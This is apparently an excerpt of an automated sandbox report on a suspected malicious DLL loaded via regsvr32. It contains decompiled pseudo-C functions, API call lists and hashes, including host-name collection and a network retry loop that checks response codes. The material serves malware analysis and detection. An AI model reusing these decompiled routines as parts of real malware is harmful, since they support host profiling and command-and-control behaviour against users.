                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 92eb54e49312665eac395bc517d51e851f55c3f6e79ad995d9a5b7626193ac11
                                • Instruction ID: 35af2d66924ecabde5544bf39cf9a7274fcae8f2bd064bfe5685a2bc6707d2f5
                                • Opcode Fuzzy Hash: 92eb54e49312665eac395bc517d51e851f55c3f6e79ad995d9a5b7626193ac11
                                • Instruction Fuzzy Hash: D631B172941109BFDB21EBD4DC84EDEBBBDEB44744F1600A9E541EB0A0F771AA54CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD2C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E02BD2C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2bdd340; // 0x5009b20
				_push(0x800);
				_push(0);
				_push( *0x2bdd238);
				if( *0x2bdd24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2bdd24c =  *0x2bdd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02BD2C0D(_t44, _t40);
						_t18 = E02BD31A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2bdd24c < 5) {
								 *0x2bdd24c =  *0x2bdd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02BD5433();
						HeapFree( *0x2bdd238, 0, _t40);
						goto L10;
					}
					_t24 = E02BD9BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02BD5450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}












                                0x02bd2c58
                                0x02bd2c58
                                0x02bd2c5b
                                0x02bd2c5c
                                0x02bd2c66
                                0x02bd2c6d
                                0x02bd2c72
                                0x02bd2c74
                                0x02bd2c7a
                                0x02bd2c9a
                                0x02bd2ca2
                                0x02bd2cba
                                0x02bd2cbc
                                0x02bd2cbd
                                0x02bd2cbf
                                0x02bd2cfd
                                0x02bd2cfd
                                0x02bd2d03
                                0x02bd2d09
                                0x02bd2d09
                                0x02bd2cc1
                                0x02bd2cc7
                                0x02bd2cca
                                0x02bd2cd9
                                0x02bd2cdb
                                0x02bd2ce2
                                0x02bd2d16
                                0x02bd2d1b
                                0x02bd2d1d
                                0x02bd2d1f
                                0x02bd2d1f
                                0x00000000
                                0x02bd2d1d
                                0x02bd2ce4
                                0x02bd2ce9
                                0x02bd2cf7
                                0x00000000
                                0x02bd2cf7
                                0x02bd2cb1
                                0x02bd2cb6
                                0x02bd2cb6
                                0x00000000
                                0x02bd2cb6
                                0x02bd2c84
                                0x00000000
                                0x00000000
                                0x02bd2c93
                                0x00000000

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 02BD2C7C
                                  • Part of subcall function 02BD5450: GetTickCount.KERNEL32 ref: 02BD5464
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD54B4
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD54D1
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD54FD
                                  • Part of subcall function 02BD5450: HeapFree.KERNEL32(00000000,?), ref: 02BD550F
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD5530
                                  • Part of subcall function 02BD5450: HeapFree.KERNEL32(00000000,?), ref: 02BD5540
                                  • Part of subcall function 02BD5450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD556E
                                  • Part of subcall function 02BD5450: GetTickCount.KERNEL32 ref: 02BD557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 02BD2C9A
                                • HeapFree.KERNEL32(00000000,00000002,02BD7D16,?,02BD7D16,00000002,?,?,02BD312C,?), ref: 02BD2CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: 42a59a3e39731bdcbdbae37381f912512b07e1822912108d5e5baaae278eb179
                                • Instruction ID: 499b9528643eaf99d19af238f403a1b26f3e60e1ebe6c21654102aaef13cce5f
                                • Opcode Fuzzy Hash: 42a59a3e39731bdcbdbae37381f912512b07e1822912108d5e5baaae278eb179
                                • Instruction Fuzzy Hash: 8D21AC7664220AABCB119F58DC90FDA3BACEB48381F0448A6FD41D7251FB30E940DFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 02BD8A76
                                • SysAllocString.OLEAUT32(02BD4BD8), ref: 02BD8ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD8ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD8ADC
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 34a85f4aa5bd453e4e5edc1f4932cd7641343a2fb9b255a44ab5d667a3bd0e3c
                                • Instruction ID: 5195684d7521c9280511496679385b4c856facc715dd1f98c0987a2a84abf43b
                                • Opcode Fuzzy Hash: 34a85f4aa5bd453e4e5edc1f4932cd7641343a2fb9b255a44ab5d667a3bd0e3c
                                • Instruction Fuzzy Hash: 6F312A72900209EFCB05DF98D8D09EE7BB9FF48345B21886AF516DB250E7319982CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD4A2A, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E02BD4A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02BD1525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2bdc284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                0x02bd4a2e
                                0x02bd4a3b
                                0x02bd4a3d
                                0x02bd4a3e
                                0x02bd4a46
                                0x02bd4a46
                                0x02bd4a4a
                                0x00000000
                                0x00000000
                                0x02bd4a41
                                0x02bd4a42
                                0x02bd4a45
                                0x02bd4a45
                                0x02bd4a52
                                0x02bd4a57
                                0x02bd4a5c
                                0x02bd4a64
                                0x02bd4a6a
                                0x02bd4a6c
                                0x02bd4a6f
                                0x02bd4a73
                                0x02bd4a75
                                0x02bd4a78
                                0x02bd4a78
                                0x02bd4a79
                                0x02bd4a7b
                                0x02bd4a78
                                0x02bd4a85
                                0x02bd4a88
                                0x02bd4a8b
                                0x02bd4a8c
                                0x02bd4a8e
                                0x02bd4a95
                                0x02bd4a95
                                0x02bd4aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,050095AC,02BD30F3,?,02BD1173,?,050095AC,?,02BD30F3), ref: 02BD4A46
                                • StrTrimA.SHLWAPI(?,02BDC284,00000002,?,02BD1173,?,050095AC,?,02BD30F3), ref: 02BD4A64
                                • StrChrA.SHLWAPI(?,00000020,?,02BD1173,?,050095AC,?,02BD30F3), ref: 02BD4A6F
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: b84fcb53ae6b0db0387b8540f750fdbf4e19fad20833d317347387ed0a9e67cd
                                • Instruction ID: 21ca2d72411a1cf1b64e18f2f1591c3e1fcb92f0b0bb2f5c777616f973d34021
                                • Opcode Fuzzy Hash: b84fcb53ae6b0db0387b8540f750fdbf4e19fad20833d317347387ed0a9e67cd
                                • Instruction Fuzzy Hash: B001B1723003076FE7204E6A8C58FE77BADEBC5744F445091B9A9CB242EA30C842C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD8B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2bdd238, 0, _a4); // executed
				return _t2;
			}




                                0x02bd8b2e
                                0x02bd8b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 20974fe05cb102635bc119f8f5131776fed704fb8051230172934826ba705844
                                • Instruction ID: 80a7ca99cd6296de59368790750bb7dcabf9193b8725f0cf3929c63705ce3ac5
                                • Opcode Fuzzy Hash: 20974fe05cb102635bc119f8f5131776fed704fb8051230172934826ba705844
                                • Instruction Fuzzy Hash: 51B01272981100ABCA114B80DE14F45FE21AB50780F004815B384C5074D3314430FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD76E7, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E02BD76E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02BD8A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2bdd2a8; // 0x242a5a8
						_t20 = _t68 + 0x2bde1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02BDA6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                0x02bd76ed
                                0x02bd76f0
                                0x02bd7700
                                0x02bd7709
                                0x02bd770d
                                0x02bd77db
                                0x02bd77e1
                                0x02bd77e1
                                0x02bd7727
                                0x02bd772c
                                0x02bd7730
                                0x02bd7736
                                0x02bd773b
                                0x02bd7742
                                0x02bd7751
                                0x02bd7751
                                0x02bd7755
                                0x02bd7757
                                0x02bd7763
                                0x02bd776e
                                0x02bd7779
                                0x02bd777d
                                0x02bd7787
                                0x02bd778b
                                0x02bd778d
                                0x02bd7792
                                0x02bd7799
                                0x02bd77a9
                                0x02bd77a9
                                0x02bd7792
                                0x02bd778b
                                0x02bd77ab
                                0x02bd77b0
                                0x02bd77b5
                                0x02bd77b5
                                0x02bd77b8
                                0x02bd77c1
                                0x02bd77c6
                                0x02bd77c6
                                0x02bd77cb
                                0x02bd77d0
                                0x02bd77d0
                                0x02bd77cb
                                0x02bd7755
                                0x02bd77d2
                                0x02bd77d8
                                0x00000000

                                APIs
                                  • Part of subcall function 02BD8A19: SysAllocString.OLEAUT32(80000002), ref: 02BD8A76
                                  • Part of subcall function 02BD8A19: SysFreeString.OLEAUT32(00000000), ref: 02BD8ADC
                                • SysFreeString.OLEAUT32(?), ref: 02BD77C6
                                • SysFreeString.OLEAUT32(02BD4BD8), ref: 02BD77D0
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 4ebfbfe153c896c391142d6d7508bc7caa79ae350499682ef3926ddce34f8ef5
                                • Instruction ID: d66ab24398251d17c4e192f3f21b010b499168653f07395ce9b9e912a1da7230
                                • Opcode Fuzzy Hash: 4ebfbfe153c896c391142d6d7508bc7caa79ae350499682ef3926ddce34f8ef5
                                • Instruction Fuzzy Hash: A1311776900119EFCB11DFA4C888CDBBB7AFBC97447154A98F8199B220E731DD51DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD5D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD5D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02BD7DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2bdd238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02BD1037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                0x02bd5d79
                                0x02bd5d81
                                0x02bd5d98
                                0x02bd5db3
                                0x02bd5db7
                                0x02bd5dbc
                                0x02bd5dbe
                                0x02bd5dd0
                                0x02bd5ddc
                                0x02bd5dc0
                                0x02bd5dc0
                                0x02bd5dc5
                                0x02bd5dca
                                0x02bd5dca
                                0x02bd5dbe
                                0x02bd5de2
                                0x02bd5de6
                                0x02bd5de6
                                0x02bd5d8d
                                0x02bd5d92
                                0x02bd5d96
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 02BD1037: SysFreeString.OLEAUT32(00000000), ref: 02BD109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,02BD5356,?,004F0053,05009368,00000000,?), ref: 02BD5DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: 22b060029f01e66e88809b8c57000369b460084e77feeba37d613e0fb73189cb
                                • Instruction ID: 2ff547d50915061c3a21f39dbfa984bb8e61351beff35337e19c1f65e9e6d661
                                • Opcode Fuzzy Hash: 22b060029f01e66e88809b8c57000369b460084e77feeba37d613e0fb73189cb
                                • Instruction Fuzzy Hash: CE016D32501619BBCF329F54CC04FEA7B65FF08790F948469FE099A124E731C960DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD831C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E02BD831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02BD1525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02BD8B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                0x02bd8321
                                0x02bd832c
                                0x02bd832e
                                0x02bd8334
                                0x02bd8336
                                0x02bd833b
                                0x02bd8344
                                0x02bd8348
                                0x02bd8351
                                0x02bd8355
                                0x02bd8364
                                0x02bd8357
                                0x02bd8358
                                0x02bd835d
                                0x02bd835d
                                0x02bd8355
                                0x02bd8348
                                0x02bd836d

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BD9C7E,74E5F710,00000000,?,?,02BD9C7E), ref: 02BD8334
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BD9C7E,02BD9C7F,?,?,02BD9C7E), ref: 02BD8351
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: aaf26258d6541254c1abdb1bb85e563cea15d9a83473fdf61f898377a386f59d
                                • Instruction ID: 4df589a008b0a2008f819b25f4215bbd938dc110160e3fa6120736b2d086ef43
                                • Opcode Fuzzy Hash: aaf26258d6541254c1abdb1bb85e563cea15d9a83473fdf61f898377a386f59d
                                • Instruction Fuzzy Hash: A2F05466600205BFEB11D69E8D01FEF76FDEBC5665F110095B509D7140FA70DA02C770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD7EFD, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2bdd23c) == 0) {
						E02BD4DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2bdd23c) == 1) {
						_t10 = E02BD2789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                0x02bd7f04
                                0x02bd7f05
                                0x02bd7f08
                                0x02bd7f3a
                                0x02bd7f3c
                                0x02bd7f3c
                                0x02bd7f0a
                                0x02bd7f0b
                                0x02bd7f20
                                0x02bd7f27
                                0x02bd7f29
                                0x02bd7f29
                                0x02bd7f27
                                0x02bd7f0b
                                0x02bd7f44

                                APIs
                                • InterlockedIncrement.KERNEL32(02BDD23C), ref: 02BD7F12
                                  • Part of subcall function 02BD2789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD279C
                                • InterlockedDecrement.KERNEL32(02BDD23C), ref: 02BD7F32
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 1834d2fe66a7bf31aceae50defcb0daeef92ccf766cd70f9bc1b42d1635501de
                                • Instruction ID: abcb4c7d2dfd328ada81c36819d9e0693c5f0e39abba276e3c2a125c59b3f67b
                                • Opcode Fuzzy Hash: 1834d2fe66a7bf31aceae50defcb0daeef92ccf766cd70f9bc1b42d1635501de
                                • Instruction Fuzzy Hash: E6E04F31248163939B315A74CC84BEAEA50DB007C8F2198D4F8C2D1050FB10C850F691
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD933A, Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x2bdd2c8; // 0x5009618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E02BD8C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E02BD97F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E02BD5988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E02BDD000 = E02BDD000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E02BD58DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x2bdd26c, 0) == 0x102);
				return _t30;
			}

















                                0x02bd933a
                                0x02bd9340
                                0x02bd9347
                                0x02bd934f
                                0x02bd9355
                                0x02bd9358
                                0x02bd935a
                                0x02bd935a
                                0x02bd9362
                                0x02bd9362
                                0x02bd936c
                                0x00000000
                                0x00000000
                                0x02bd937b
                                0x02bd937f
                                0x02bd9383
                                0x02bd9388
                                0x02bd938c
                                0x02bd93c8
                                0x02bd93ca
                                0x02bd93ca
                                0x02bd938e
                                0x02bd9395
                                0x02bd93bf
                                0x02bd9397
                                0x02bd9397
                                0x02bd939c
                                0x02bd93b8
                                0x02bd939e
                                0x02bd939e
                                0x02bd93a3
                                0x02bd93a8
                                0x02bd93ab
                                0x02bd93ad
                                0x02bd93b2
                                0x02bd93b4
                                0x02bd93b4
                                0x02bd93b2
                                0x02bd93a3
                                0x02bd939c
                                0x02bd9395
                                0x02bd938c
                                0x02bd93d7
                                0x02bd93dc
                                0x02bd93dc
                                0x02bd9400

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 02BD93EC
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 0d235ef39af7f117893c089e49ceefc08b86f0414f0630ec27fe37f7f3d8ed7a
                                • Instruction ID: 4b098b22ad5152a46a29b21e611c693010936452c93defdaae527d836c47087c
                                • Opcode Fuzzy Hash: 0d235ef39af7f117893c089e49ceefc08b86f0414f0630ec27fe37f7f3d8ed7a
                                • Instruction Fuzzy Hash: E721C032B01A4A9BDF10DE19C864BEE77A6EB807B4F1084A5E405E72C0F770D811CB50
